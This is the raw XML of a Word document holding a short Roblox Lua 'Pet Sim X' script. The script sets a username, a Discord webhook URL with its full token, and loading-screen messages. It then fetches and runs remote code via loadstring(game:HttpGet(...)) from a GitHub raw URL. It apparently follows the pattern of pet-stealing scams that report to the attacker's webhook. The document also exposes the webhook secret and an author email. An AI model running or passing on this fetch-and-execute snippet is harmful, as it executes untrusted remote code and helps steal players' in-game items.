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5454" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>Username = “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>konmikoo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393DF60" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebHook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E47CBF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://discord.com/api/webhooks/1091803580626895029/fSRp9KijTo4GIWDEcaJslsfpUOxQFdCWls_aYuHzevHrg1JyH0vMABDtWn0pm7N1P2Lb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AED3CF2" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Loadingscreen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47C5F1" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G.CustomScriptName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = “Pet Sim x Script”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81609A" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>_G.Text1 = “Script Loaded…”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463DAAC" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>_G.Text2 = “Waiting for Script…”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8D373" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>_G.Text3 = “Checking Scripts…”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5464A9E2" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>_G.Text4 = “Starting Script…”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D62B67" w14:textId="77777777" w:rsidR="004754DA" w:rsidRDefault="004754DA">
      <w:r>
        <w:t>Loadstring(game:HttpGet(</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E47CBF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>))()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0047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DA"/>
    <w:rsid w:val="004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8B71"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{73DEFECA-A739-2548-AB33-709A5671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raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/api/webhooks/1091803580626895029/fSRp9KijTo4GIWDEcaJslsfpUOxQFdCWls_aYuHzevHrg1JyH0vMABDtWn0pm7N1P2L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fukoonn@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>fukoonn@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-01T19:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-01T19:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>